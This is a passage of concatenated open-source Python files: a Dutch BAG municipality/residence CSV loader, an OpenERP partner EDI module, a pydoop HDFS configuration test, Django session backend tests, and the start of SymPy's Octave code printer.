    Return *node* unchanged if it is a non-empty string, else None.

    Despite the name, no numeric conversion takes place: the value is
    the raw code string from the CSV (e.g. a gemeente or woonplaats
    code) and is kept as-is so leading zeros survive; empty fields are
    normalised to None.
    """
    # Currently only used for the gemeente_woonplaats CSV.
    # isinstance instead of type(...) == str: also accepts str subclasses.
    if isinstance(node, str) and node:
        return node
    return None
class BestuurlijkObject:
    """Base class for administrative (bestuurlijk) objects.

    The BAG itself contains no administrative objects such as gemeenten
    and provincies; subclasses enrich the BAG with that data.
    """

    def __init__(self):
        # Identifier; left None here, presumably assigned by loading
        # code elsewhere — TODO confirm against callers.
        self.id = None
class GemeenteWoonplaats(BestuurlijkObject):
    """
    Gemeente/woonplaats mapping record, built from one CSV row.

    Expected CSV layout (since 24 Jan 2012, 8 columns):
    Woonplaats;Woonplaats code;Ingangsdatum WPL;Einddatum WPL;
    Gemeente;Gemeente code;Ingangsdatum nieuwe gemeente;Gemeente beeindigd per
    """
    def __init__(self,record):
        # TODO: the CSV is not always fully populated; check that a record
        # actually contains the minimum number of fields.
        # Historical layout (pre 24 Jan 2012) had extra columns:
        # Aansluitdatum;Bijzonderheden;Nieuwe code Gemeente;
        # Gemeente beeindigd per;Behandeld — see commented assignments below.
        # Dirty! Pad the record with Nones so short rows can still be
        # indexed up to position 7 without IndexError.
        # NOTE(review): this mutates the caller's list in place — confirm
        # callers do not reuse `record` afterwards.
        emptylist = [None,None,None,None,None,None,None,None]
        record.extend(emptylist)
        # Only populate attributes when the row has a woonplaats name;
        # NOTE(review): otherwise no attributes are set and __repr__/insert
        # would fail on this instance.
        if record[0]:
            #print record
            self.tag = "gem_LVC:GemeenteWoonplaats"
            self.naam = "gemeente_woonplaats"
            self.type = 'G_W'
            self.woonplaatsnaam = record[0]
            self.woonplaatscode = getNumber(record[1])
            self.begindatum_woonplaats = getDate(record[2])
            self.einddatum_woonplaats = getDate(record[3])
            self.gemeentenaam = record[4]
            self.gemeentecode = getNumber(record[5])
            self.begindatum_gemeente = getDate(record[6])
            self.einddatum_gemeente = getDate(record[7])
            # Columns from the pre-2012 layout, no longer present:
            # self.aansluitdatum_gemeente = getDate(record[7])
            # self.bijzonderheden = record[8]
            # self.gemeentecode_nieuw = getNumber(record[9])
            # self.behandeld = record[11]

    def __repr__(self):
        return "<GemeenteWoonplaats('%s','%s', '%s')>" % (self.naam, self.gemeentecode, self.woonplaatscode)

    def insert(self):
        # Prepare the parameterized INSERT statement and its value tuple;
        # execution happens elsewhere (self.sql / self.valuelist are read
        # by the loading code).
        self.sql = """INSERT INTO gemeente_woonplaats (
            woonplaatsnaam,
            woonplaatscode,
            begindatum_woonplaats,
            einddatum_woonplaats,
            gemeentenaam,
            gemeentecode,
            begindatum_gemeente,
            einddatum_gemeente)
            VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"""
        self.valuelist = (self.woonplaatsnaam, self.woonplaatscode, self.begindatum_woonplaats,
            self.einddatum_woonplaats,self.gemeentenaam, self.gemeentecode, self.begindatum_gemeente,
            self.einddatum_gemeente)
class GemeenteProvincie(BestuurlijkObject):
    """
    Enrichment: municipality -> province mapping.

    CSV schema: ``Gemcode;Gemcodel;provcode;provcodel`` (for example
    ``0003;Appingedam;20;Groningen``); every field is always filled
    (415 municipalities in 2012).
    """
    def __init__(self, record):
        self.naam = 'gemeente_provincie'
        self.gemeentecode = getNumber(record[0])
        self.gemeentenaam = record[1]
        self.provinciecode = getNumber(record[2])
        self.provincienaam = record[3]
    def __repr__(self):
        return "<GemeenteProvincie('%s','%s', '%s')>" % (self.naam, self.gemeentenaam, self.provincienaam)
    def insert(self):
        # Prepare (but do not execute) the INSERT statement and its values.
        self.sql = """INSERT INTO gemeente_provincie (
            gemeentecode,
            gemeentenaam,
            provinciecode,
            provincienaam)
            VALUES (%s, %s, %s, %s)"""
        self.valuelist = (self.gemeentecode, self.gemeentenaam, self.provinciecode, self.provincienaam)
# Factory: create a BestuurlijkObject from a CSV header + record.
def BestuurlijkObjectFabriek(cols, record):
    """Return the BestuurlijkObject subclass matching the CSV header, or None."""
    if cols[0] == 'Woonplaats':
        return GemeenteWoonplaats(record)
    if cols[1] == 'Gemcodel':
        return GemeenteProvincie(record)
    return None
| gpl-3.0 |
hbrunn/OpenUpgrade | addons/edi/models/res_partner.py | 437 | 4243 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2011-2012 OpenERP S.A. <http://openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp.osv import osv
from edi import EDIMixin
from openerp import SUPERUSER_ID
_logger = logging.getLogger(__name__)
# Partner fields included in EDI export/import; True marks a field as exported.
RES_PARTNER_EDI_STRUCT = {
    'name': True,
    'ref': True,
    'lang': True,
    'website': True,
    'email': True,
    'street': True,
    'street2': True,
    'zip': True,
    'city': True,
    'country_id': True,
    'state_id': True,
    'phone': True,
    'fax': True,
    'mobile': True,
}
class res_partner(osv.osv, EDIMixin):
    """EDI (Electronic Data Interchange) support for ``res.partner``."""
    _inherit = "res.partner"

    def edi_export(self, cr, uid, records, edi_struct=None, context=None):
        """Export ``records``, defaulting to RES_PARTNER_EDI_STRUCT when no
        custom ``edi_struct`` is supplied."""
        return super(res_partner,self).edi_export(cr, uid, records,
                                                  edi_struct or dict(RES_PARTNER_EDI_STRUCT),
                                                  context=context)

    def _get_bank_type(self, cr, uid, context=None):
        """Return the code of the bank account type to use for imported bank
        accounts, creating a free-form generic EDI type if needed."""
        # first option: the "normal" bank type, installed by default
        res_partner_bank_type = self.pool.get('res.partner.bank.type')
        try:
            return self.pool.get('ir.model.data').get_object(cr, uid, 'base', 'bank_normal', context=context).code
        except ValueError:
            pass
        # second option: create a new custom type for EDI or use it if already created, as IBAN type is
        # not always appropriate: we need a free-form bank type for max flexibility (users can correct
        # data manually after import)
        code, label = 'edi_generic', 'Generic Bank Type (auto-created for EDI)'
        bank_code_ids = res_partner_bank_type.search(cr, uid, [('code','=',code)], context=context)
        if not bank_code_ids:
            _logger.info('Normal bank account type is missing, creating '
                         'a generic bank account type for EDI.')
            # Bugfix: use the local model reference (``self`` has no
            # ``res_partner_bank_type`` attribute) and store ``code`` - not
            # ``label`` - as the type's code, so the search above finds the
            # type again on subsequent imports.
            res_partner_bank_type.create(cr, SUPERUSER_ID, {'name': label,
                                                            'code': code})
        return code

    def edi_import(self, cr, uid, edi_document, context=None):
        """Import a partner EDI document; related bank accounts (the
        ``bank_ids`` entry), if any, are imported as ``res.partner.bank``
        records linked to the new contact."""
        # handle bank info, if any
        edi_bank_ids = edi_document.pop('bank_ids', None)
        contact_id = super(res_partner,self).edi_import(cr, uid, edi_document, context=context)
        if edi_bank_ids:
            contact = self.browse(cr, uid, contact_id, context=context)
            import_ctx = dict((context or {}),
                              default_partner_id = contact.id,
                              default_state=self._get_bank_type(cr, uid, context))
            for ext_bank_id, bank_name in edi_bank_ids:
                try:
                    self.edi_import_relation(cr, uid, 'res.partner.bank',
                                             bank_name, ext_bank_id, context=import_ctx)
                except osv.except_osv:
                    # failed to import it, try again with unrestricted default type
                    # (message fixed: adjacent literals previously produced
                    # "...usingbank type..." with no separating space)
                    _logger.warning('Failed to import bank account using '
                                    'bank type: %s, ignoring', import_ctx['default_state'],
                                    exc_info=True)
        return contact_id
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
crs4/pydoop | test/hdfs/try_hdfs.py | 2 | 1699 | # BEGIN_COPYRIGHT
#
# Copyright 2009-2021 CRS4.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# END_COPYRIGHT
"""
Check that resetting the hdfs module after changing
os.environ['HADOOP_CONF_DIR'] works (i.e., Pydoop references the
correct HDFS service).
Note that it does **NOT** work if you've already instantiated an hdfs
handle, and this is NOT due to the caching system.
"""
from __future__ import print_function
import sys
import os
import argparse
import pydoop.hdfs as hdfs
def dump_status(fs):
    """Print an hdfs handle's connection info and the module-level caches."""
    conn_info = (fs.host, fs.port, fs.user)
    print("(host, port, user) = %r" % (conn_info,))
    print("_CACHE = %r" % (fs._CACHE,))
    print("_ALIASES = %r" % (fs._ALIASES,))
    print()
def main(argv=None):
    """
    Parse command-line arguments, optionally repoint HADOOP_CONF_DIR,
    reset the hdfs module, and dump connection status before/after close.

    ``argv`` defaults to ``sys.argv[1:]`` evaluated at call time (the
    original bound it at import time, freezing later changes to sys.argv).
    """
    if argv is None:
        argv = sys.argv[1:]
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument("--conf-dir", metavar="HADOOP_CONF_DIR")
    args = parser.parse_args(argv)
    if args.conf_dir:
        os.environ["HADOOP_CONF_DIR"] = os.path.abspath(args.conf_dir)
        # Make Pydoop re-read the (possibly changed) HADOOP_CONF_DIR.
        hdfs.reset()
    fs = hdfs.hdfs()
    print("--- OPEN ---")
    dump_status(fs)
    print("cwd:", fs.working_directory())
    print()  # was a bare ``print`` expression: a no-op, not a call
    fs.close()
    print("--- CLOSED ---")
    dump_status(fs)
# Script entry point.
if __name__ == "__main__":
    main()
| apache-2.0 |
weiawe/django | tests/sessions_tests/tests.py | 10 | 24700 | import base64
import os
import shutil
import string
import sys
import tempfile
import unittest
from datetime import timedelta
from django.conf import settings
from django.contrib.sessions.backends.cache import SessionStore as CacheSession
from django.contrib.sessions.backends.cached_db import \
SessionStore as CacheDBSession
from django.contrib.sessions.backends.db import SessionStore as DatabaseSession
from django.contrib.sessions.backends.file import SessionStore as FileSession
from django.contrib.sessions.backends.signed_cookies import \
SessionStore as CookieSession
from django.contrib.sessions.exceptions import InvalidSessionKey
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.sessions.models import Session
from django.contrib.sessions.serializers import (
JSONSerializer, PickleSerializer,
)
from django.core import management
from django.core.cache import caches
from django.core.cache.backends.base import InvalidCacheBackendError
from django.core.exceptions import ImproperlyConfigured
from django.http import HttpResponse
from django.test import (
RequestFactory, TestCase, ignore_warnings, override_settings,
)
from django.test.utils import patch_logger
from django.utils import six, timezone
from django.utils.encoding import force_text
from django.utils.six.moves import http_cookies
class SessionTestsMixin(object):
    # This does not inherit from TestCase to avoid any tests being run with this
    # class, which wouldn't work, and to allow different TestCase subclasses to
    # be used.
    """Backend-agnostic session tests, mixed into one TestCase per backend."""
    backend = None # subclasses must specify
    def setUp(self):
        self.session = self.backend()
    def tearDown(self):
        # NB: be careful to delete any sessions created; stale sessions fill up
        # the /tmp (with some backends) and eventually overwhelm it after lots
        # of runs (think buildbots)
        self.session.delete()
    def test_new_session(self):
        self.assertFalse(self.session.modified)
        self.assertFalse(self.session.accessed)
    def test_get_empty(self):
        self.assertEqual(self.session.get('cat'), None)
    def test_store(self):
        self.session['cat'] = "dog"
        self.assertTrue(self.session.modified)
        self.assertEqual(self.session.pop('cat'), 'dog')
    def test_pop(self):
        self.session['some key'] = 'exists'
        # Need to reset these to pretend we haven't accessed it:
        # NOTE(review): these assignments set attributes on the test case, not
        # on self.session - presumably self.session.accessed/modified were
        # intended; verify before relying on this reset.
        self.accessed = False
        self.modified = False
        self.assertEqual(self.session.pop('some key'), 'exists')
        self.assertTrue(self.session.accessed)
        self.assertTrue(self.session.modified)
        self.assertEqual(self.session.get('some key'), None)
    def test_pop_default(self):
        self.assertEqual(self.session.pop('some key', 'does not exist'),
                         'does not exist')
        self.assertTrue(self.session.accessed)
        self.assertFalse(self.session.modified)
    def test_setdefault(self):
        self.assertEqual(self.session.setdefault('foo', 'bar'), 'bar')
        self.assertEqual(self.session.setdefault('foo', 'baz'), 'bar')
        self.assertTrue(self.session.accessed)
        self.assertTrue(self.session.modified)
    def test_update(self):
        self.session.update({'update key': 1})
        self.assertTrue(self.session.accessed)
        self.assertTrue(self.session.modified)
        self.assertEqual(self.session.get('update key', None), 1)
    def test_has_key(self):
        self.session['some key'] = 1
        self.session.modified = False
        self.session.accessed = False
        self.assertIn('some key', self.session)
        self.assertTrue(self.session.accessed)
        self.assertFalse(self.session.modified)
    def test_values(self):
        self.assertEqual(list(self.session.values()), [])
        self.assertTrue(self.session.accessed)
        self.session['some key'] = 1
        self.assertEqual(list(self.session.values()), [1])
    def test_iterkeys(self):
        self.session['x'] = 1
        self.session.modified = False
        self.session.accessed = False
        i = six.iterkeys(self.session)
        self.assertTrue(hasattr(i, '__iter__'))
        self.assertTrue(self.session.accessed)
        self.assertFalse(self.session.modified)
        self.assertEqual(list(i), ['x'])
    def test_itervalues(self):
        self.session['x'] = 1
        self.session.modified = False
        self.session.accessed = False
        i = six.itervalues(self.session)
        self.assertTrue(hasattr(i, '__iter__'))
        self.assertTrue(self.session.accessed)
        self.assertFalse(self.session.modified)
        self.assertEqual(list(i), [1])
    def test_iteritems(self):
        self.session['x'] = 1
        self.session.modified = False
        self.session.accessed = False
        i = six.iteritems(self.session)
        self.assertTrue(hasattr(i, '__iter__'))
        self.assertTrue(self.session.accessed)
        self.assertFalse(self.session.modified)
        self.assertEqual(list(i), [('x', 1)])
    def test_clear(self):
        self.session['x'] = 1
        self.session.modified = False
        self.session.accessed = False
        self.assertEqual(list(self.session.items()), [('x', 1)])
        self.session.clear()
        self.assertEqual(list(self.session.items()), [])
        self.assertTrue(self.session.accessed)
        self.assertTrue(self.session.modified)
    def test_save(self):
        if (hasattr(self.session, '_cache') and 'DummyCache' in
                settings.CACHES[settings.SESSION_CACHE_ALIAS]['BACKEND']):
            raise unittest.SkipTest("Session saving tests require a real cache backend")
        self.session.save()
        self.assertTrue(self.session.exists(self.session.session_key))
    def test_delete(self):
        self.session.save()
        self.session.delete(self.session.session_key)
        self.assertFalse(self.session.exists(self.session.session_key))
    def test_flush(self):
        self.session['foo'] = 'bar'
        self.session.save()
        prev_key = self.session.session_key
        self.session.flush()
        self.assertFalse(self.session.exists(prev_key))
        self.assertNotEqual(self.session.session_key, prev_key)
        self.assertTrue(self.session.modified)
        self.assertTrue(self.session.accessed)
    def test_cycle(self):
        # Cycling the key must keep the data but change the session key.
        self.session['a'], self.session['b'] = 'c', 'd'
        self.session.save()
        prev_key = self.session.session_key
        prev_data = list(self.session.items())
        self.session.cycle_key()
        self.assertNotEqual(self.session.session_key, prev_key)
        self.assertEqual(list(self.session.items()), prev_data)
    def test_invalid_key(self):
        # Submitting an invalid session key (either by guessing, or if the db has
        # removed the key) results in a new key being generated.
        try:
            session = self.backend('1')
            try:
                session.save()
            except AttributeError:
                self.fail(
                    "The session object did not save properly. "
                    "Middleware may be saving cache items without namespaces."
                )
            self.assertNotEqual(session.session_key, '1')
            self.assertEqual(session.get('cat'), None)
            session.delete()
        finally:
            # Some backends leave a stale cache entry for the invalid
            # session key; make sure that entry is manually deleted
            session.delete('1')
    def test_session_key_is_read_only(self):
        def set_session_key(session):
            session.session_key = session._get_new_session_key()
        self.assertRaises(AttributeError, set_session_key, self.session)
    # Custom session expiry
    def test_default_expiry(self):
        # A normal session has a max age equal to settings
        self.assertEqual(self.session.get_expiry_age(), settings.SESSION_COOKIE_AGE)
        # So does a custom session with an idle expiration time of 0 (but it'll
        # expire at browser close)
        self.session.set_expiry(0)
        self.assertEqual(self.session.get_expiry_age(), settings.SESSION_COOKIE_AGE)
    def test_custom_expiry_seconds(self):
        modification = timezone.now()
        self.session.set_expiry(10)
        date = self.session.get_expiry_date(modification=modification)
        self.assertEqual(date, modification + timedelta(seconds=10))
        age = self.session.get_expiry_age(modification=modification)
        self.assertEqual(age, 10)
    def test_custom_expiry_timedelta(self):
        modification = timezone.now()
        # Mock timezone.now, because set_expiry calls it on this code path.
        original_now = timezone.now
        try:
            timezone.now = lambda: modification
            self.session.set_expiry(timedelta(seconds=10))
        finally:
            timezone.now = original_now
        date = self.session.get_expiry_date(modification=modification)
        self.assertEqual(date, modification + timedelta(seconds=10))
        age = self.session.get_expiry_age(modification=modification)
        self.assertEqual(age, 10)
    def test_custom_expiry_datetime(self):
        modification = timezone.now()
        self.session.set_expiry(modification + timedelta(seconds=10))
        date = self.session.get_expiry_date(modification=modification)
        self.assertEqual(date, modification + timedelta(seconds=10))
        age = self.session.get_expiry_age(modification=modification)
        self.assertEqual(age, 10)
    def test_custom_expiry_reset(self):
        self.session.set_expiry(None)
        self.session.set_expiry(10)
        self.session.set_expiry(None)
        self.assertEqual(self.session.get_expiry_age(), settings.SESSION_COOKIE_AGE)
    def test_get_expire_at_browser_close(self):
        # Tests get_expire_at_browser_close with different settings and different
        # set_expiry calls
        with override_settings(SESSION_EXPIRE_AT_BROWSER_CLOSE=False):
            self.session.set_expiry(10)
            self.assertFalse(self.session.get_expire_at_browser_close())
            self.session.set_expiry(0)
            self.assertTrue(self.session.get_expire_at_browser_close())
            self.session.set_expiry(None)
            self.assertFalse(self.session.get_expire_at_browser_close())
        with override_settings(SESSION_EXPIRE_AT_BROWSER_CLOSE=True):
            self.session.set_expiry(10)
            self.assertFalse(self.session.get_expire_at_browser_close())
            self.session.set_expiry(0)
            self.assertTrue(self.session.get_expire_at_browser_close())
            self.session.set_expiry(None)
            self.assertTrue(self.session.get_expire_at_browser_close())
    def test_decode(self):
        # Ensure we can decode what we encode
        data = {'a test key': 'a test value'}
        encoded = self.session.encode(data)
        self.assertEqual(self.session.decode(encoded), data)
    def test_decode_failure_logged_to_security(self):
        bad_encode = base64.b64encode(b'flaskdj:alkdjf')
        with patch_logger('django.security.SuspiciousSession', 'warning') as calls:
            self.assertEqual({}, self.session.decode(bad_encode))
        # check that the failed decode is logged
        self.assertEqual(len(calls), 1)
        self.assertIn('corrupted', calls[0])
    def test_actual_expiry(self):
        # this doesn't work with JSONSerializer (serializing timedelta)
        with override_settings(SESSION_SERIALIZER='django.contrib.sessions.serializers.PickleSerializer'):
            self.session = self.backend() # reinitialize after overriding settings
            # Regression test for #19200
            old_session_key = None
            new_session_key = None
            try:
                self.session['foo'] = 'bar'
                self.session.set_expiry(-timedelta(seconds=10))
                self.session.save()
                old_session_key = self.session.session_key
                # With an expiry date in the past, the session expires instantly.
                new_session = self.backend(self.session.session_key)
                new_session_key = new_session.session_key
                self.assertNotIn('foo', new_session)
            finally:
                self.session.delete(old_session_key)
                self.session.delete(new_session_key)
class DatabaseSessionTests(SessionTestsMixin, TestCase):
    """Run the common session tests against the database backend."""
    backend = DatabaseSession
    def test_session_str(self):
        "Session repr should be the session key."
        self.session['x'] = 1
        self.session.save()
        session_key = self.session.session_key
        s = Session.objects.get(session_key=session_key)
        self.assertEqual(force_text(s), session_key)
    def test_session_get_decoded(self):
        """
        Test we can use Session.get_decoded to retrieve data stored
        in normal way
        """
        self.session['x'] = 1
        self.session.save()
        s = Session.objects.get(session_key=self.session.session_key)
        self.assertEqual(s.get_decoded(), {'x': 1})
    def test_sessionmanager_save(self):
        """
        Test SessionManager.save method
        """
        # Create a session
        self.session['y'] = 1
        self.session.save()
        s = Session.objects.get(session_key=self.session.session_key)
        # Change it
        Session.objects.save(s.session_key, {'y': 2}, s.expire_date)
        # Clear cache, so that it will be retrieved from DB
        del self.session._session_cache
        self.assertEqual(self.session['y'], 2)
    @override_settings(SESSION_ENGINE="django.contrib.sessions.backends.db")
    def test_clearsessions_command(self):
        """
        Test clearsessions command for clearing expired sessions.
        """
        self.assertEqual(0, Session.objects.count())
        # One object in the future
        self.session['foo'] = 'bar'
        self.session.set_expiry(3600)
        self.session.save()
        # One object in the past
        other_session = self.backend()
        other_session['foo'] = 'bar'
        other_session.set_expiry(-3600)
        other_session.save()
        # Two sessions are in the database before clearsessions...
        self.assertEqual(2, Session.objects.count())
        management.call_command('clearsessions')
        # ... and one is deleted.
        self.assertEqual(1, Session.objects.count())
@override_settings(USE_TZ=True)
class DatabaseSessionWithTimeZoneTests(DatabaseSessionTests):
    """Re-run the database backend tests with USE_TZ=True."""
    pass
class CacheDBSessionTests(SessionTestsMixin, TestCase):
    """Run the common session tests against the cached-db backend."""
    backend = CacheDBSession
    @unittest.skipIf('DummyCache' in
        settings.CACHES[settings.SESSION_CACHE_ALIAS]['BACKEND'],
        "Session saving tests require a real cache backend")
    def test_exists_searches_cache_first(self):
        self.session.save()
        with self.assertNumQueries(0):
            self.assertTrue(self.session.exists(self.session.session_key))
    # Some backends might issue a warning
    @ignore_warnings(module="django.core.cache.backends.base")
    def test_load_overlong_key(self):
        self.session._session_key = (string.ascii_letters + string.digits) * 20
        self.assertEqual(self.session.load(), {})
    @override_settings(SESSION_CACHE_ALIAS='sessions')
    def test_non_default_cache(self):
        # 21000 - CacheDB backend should respect SESSION_CACHE_ALIAS.
        self.assertRaises(InvalidCacheBackendError, self.backend)
@override_settings(USE_TZ=True)
class CacheDBSessionWithTimeZoneTests(CacheDBSessionTests):
    """Re-run the cached-db backend tests with USE_TZ=True."""
    pass
# Don't need DB flushing for these tests, so can use unittest.TestCase as base class
class FileSessionTests(SessionTestsMixin, unittest.TestCase):
    """Run the common session tests against the file-based backend."""
    backend = FileSession
    def setUp(self):
        # Do file session tests in an isolated directory, and kill it after we're done.
        self.original_session_file_path = settings.SESSION_FILE_PATH
        self.temp_session_store = settings.SESSION_FILE_PATH = tempfile.mkdtemp()
        # Reset the file session backend's internal caches
        if hasattr(self.backend, '_storage_path'):
            del self.backend._storage_path
        super(FileSessionTests, self).setUp()
    def tearDown(self):
        super(FileSessionTests, self).tearDown()
        settings.SESSION_FILE_PATH = self.original_session_file_path
        shutil.rmtree(self.temp_session_store)
    @override_settings(
        SESSION_FILE_PATH="/if/this/directory/exists/you/have/a/weird/computer")
    def test_configuration_check(self):
        del self.backend._storage_path
        # Make sure the file backend checks for a good storage dir
        self.assertRaises(ImproperlyConfigured, self.backend)
    def test_invalid_key_backslash(self):
        # Ensure we don't allow directory-traversal.
        # This is tested directly on _key_to_file, as load() will swallow
        # a SuspiciousOperation in the same way as an IOError - by creating
        # a new session, making it unclear whether the slashes were detected.
        self.assertRaises(InvalidSessionKey,
                          self.backend()._key_to_file, "a\\b\\c")
    def test_invalid_key_forwardslash(self):
        # Ensure we don't allow directory-traversal
        self.assertRaises(InvalidSessionKey,
                          self.backend()._key_to_file, "a/b/c")
    @override_settings(SESSION_ENGINE="django.contrib.sessions.backends.file")
    def test_clearsessions_command(self):
        """
        Test clearsessions command for clearing expired sessions.
        """
        storage_path = self.backend._get_storage_path()
        file_prefix = settings.SESSION_COOKIE_NAME
        def count_sessions():
            return len([session_file for session_file in os.listdir(storage_path)
                        if session_file.startswith(file_prefix)])
        self.assertEqual(0, count_sessions())
        # One object in the future
        self.session['foo'] = 'bar'
        self.session.set_expiry(3600)
        self.session.save()
        # One object in the past
        other_session = self.backend()
        other_session['foo'] = 'bar'
        other_session.set_expiry(-3600)
        other_session.save()
        # Two sessions are in the filesystem before clearsessions...
        self.assertEqual(2, count_sessions())
        management.call_command('clearsessions')
        # ... and one is deleted.
        self.assertEqual(1, count_sessions())
class CacheSessionTests(SessionTestsMixin, unittest.TestCase):
    """Run the common session tests against the pure-cache backend."""
    backend = CacheSession
    # Some backends might issue a warning
    @ignore_warnings(module="django.core.cache.backends.base")
    def test_load_overlong_key(self):
        self.session._session_key = (string.ascii_letters + string.digits) * 20
        self.assertEqual(self.session.load(), {})
    def test_default_cache(self):
        self.session.save()
        self.assertNotEqual(caches['default'].get(self.session.cache_key), None)
    @override_settings(CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
        },
        'sessions': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'LOCATION': 'session',
        },
    }, SESSION_CACHE_ALIAS='sessions')
    def test_non_default_cache(self):
        # Re-initialize the session backend to make use of overridden settings.
        self.session = self.backend()
        self.session.save()
        self.assertEqual(caches['default'].get(self.session.cache_key), None)
        self.assertNotEqual(caches['sessions'].get(self.session.cache_key), None)
class SessionMiddlewareTests(TestCase):
    """Tests for SessionMiddleware's cookie handling."""
    @override_settings(SESSION_COOKIE_SECURE=True)
    def test_secure_session_cookie(self):
        request = RequestFactory().get('/')
        response = HttpResponse('Session test')
        middleware = SessionMiddleware()
        # Simulate a request that modifies the session
        middleware.process_request(request)
        request.session['hello'] = 'world'
        # Handle the response through the middleware
        response = middleware.process_response(request, response)
        self.assertTrue(
            response.cookies[settings.SESSION_COOKIE_NAME]['secure'])
    @override_settings(SESSION_COOKIE_HTTPONLY=True)
    def test_httponly_session_cookie(self):
        request = RequestFactory().get('/')
        response = HttpResponse('Session test')
        middleware = SessionMiddleware()
        # Simulate a request that modifies the session
        middleware.process_request(request)
        request.session['hello'] = 'world'
        # Handle the response through the middleware
        response = middleware.process_response(request, response)
        self.assertTrue(
            response.cookies[settings.SESSION_COOKIE_NAME]['httponly'])
        self.assertIn(http_cookies.Morsel._reserved['httponly'],
                      str(response.cookies[settings.SESSION_COOKIE_NAME]))
    @override_settings(SESSION_COOKIE_HTTPONLY=False)
    def test_no_httponly_session_cookie(self):
        request = RequestFactory().get('/')
        response = HttpResponse('Session test')
        middleware = SessionMiddleware()
        # Simulate a request that modifies the session
        middleware.process_request(request)
        request.session['hello'] = 'world'
        # Handle the response through the middleware
        response = middleware.process_response(request, response)
        self.assertFalse(response.cookies[settings.SESSION_COOKIE_NAME]['httponly'])
        self.assertNotIn(http_cookies.Morsel._reserved['httponly'],
                         str(response.cookies[settings.SESSION_COOKIE_NAME]))
    def test_session_save_on_500(self):
        # A session modified during a request that ends in a server error
        # must not be persisted.
        request = RequestFactory().get('/')
        response = HttpResponse('Horrible error')
        response.status_code = 500
        middleware = SessionMiddleware()
        # Simulate a request that modifies the session
        middleware.process_request(request)
        request.session['hello'] = 'world'
        # Handle the response through the middleware
        response = middleware.process_response(request, response)
        # Check that the value wasn't saved above.
        self.assertNotIn('hello', request.session.load())
    def test_session_delete_on_end(self):
        request = RequestFactory().get('/')
        response = HttpResponse('Session test')
        middleware = SessionMiddleware()
        # Before deleting, there has to be an existing cookie
        request.COOKIES[settings.SESSION_COOKIE_NAME] = 'abc'
        # Simulate a request that ends the session
        middleware.process_request(request)
        request.session.flush()
        # Handle the response through the middleware
        response = middleware.process_response(request, response)
        # Check that the cookie was deleted, not recreated.
        # A deleted cookie header looks like:
        #  Set-Cookie: sessionid=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
        self.assertEqual(
            'Set-Cookie: {}={}; expires=Thu, 01-Jan-1970 00:00:00 GMT; '
            'Max-Age=0; Path=/'.format(
                settings.SESSION_COOKIE_NAME,
                '""' if sys.version_info >= (3, 5) else '',
            ),
            str(response.cookies[settings.SESSION_COOKIE_NAME])
        )
# Don't need DB flushing for these tests, so can use unittest.TestCase as base class
class CookieSessionTests(SessionTestsMixin, unittest.TestCase):
    """Run the common session tests against the signed-cookie backend."""
    backend = CookieSession
    def test_save(self):
        """
        This test tested exists() in the other session backends, but that
        doesn't make sense for us.
        """
        pass
    def test_cycle(self):
        """
        This test tested cycle_key() which would create a new session
        key for the same session data. But we can't invalidate previously
        signed cookies (other than letting them expire naturally) so
        testing for this behavior is meaningless.
        """
        pass
    @unittest.expectedFailure
    def test_actual_expiry(self):
        # The cookie backend doesn't handle non-default expiry dates, see #19201
        super(CookieSessionTests, self).test_actual_expiry()
    def test_unpickling_exception(self):
        # signed_cookies backend should handle unpickle exceptions gracefully
        # by creating a new session
        self.assertEqual(self.session.serializer, JSONSerializer)
        self.session.save()
        self.session.serializer = PickleSerializer
        self.session.load()
| bsd-3-clause |
AkademieOlympia/sympy | sympy/printing/octave.py | 52 | 22542 | """
Octave (and Matlab) code printer
The `OctaveCodePrinter` converts SymPy expressions into Octave expressions.
It uses a subset of the Octave language for Matlab compatibility.
A complete code generator, which uses `octave_code` extensively, can be found
in `sympy.utilities.codegen`. The `codegen` module can be used to generate
complete source code files.
"""
from __future__ import print_function, division
from sympy.core import Mul, Pow, S, Rational
from sympy.core.compatibility import string_types, range
from sympy.core.mul import _keep_coeff
from sympy.printing.codeprinter import CodePrinter, Assignment
from sympy.printing.precedence import precedence
from re import search
# List of known functions. First, those that have the same name in
# SymPy and Octave. This is almost certainly incomplete!
known_fcns_src1 = ["sin", "cos", "tan", "asin", "acos", "atan", "atan2",
                   "sinh", "cosh", "tanh", "asinh", "acosh", "atanh",
                   "log", "exp", "erf", "gamma", "sign", "floor", "csc",
                   "sec", "cot", "coth", "acot", "acoth", "erfc",
                   "besselj", "bessely", "besseli", "besselk",
                   "erfinv", "erfcinv", "factorial" ]
# These functions have different names ("Sympy": "Octave"), more
# generally a mapping to (argument_conditions, octave_function).
# Used by OctaveCodePrinter to translate SymPy function names on output.
known_fcns_src2 = {
    "Abs": "abs",
    "ceiling": "ceil",
    "conjugate": "conj",
    "DiracDelta": "dirac",
    "Heaviside": "heaviside",
}
class OctaveCodePrinter(CodePrinter):
"""
A printer to convert expressions to strings of Octave/Matlab code.
"""
printmethod = "_octave"
language = "Octave"
_operators = {
'and': '&',
'or': '|',
'not': '~',
}
_default_settings = {
'order': None,
'full_prec': 'auto',
'precision': 16,
'user_functions': {},
'human': True,
'contract': True,
'inline': True,
}
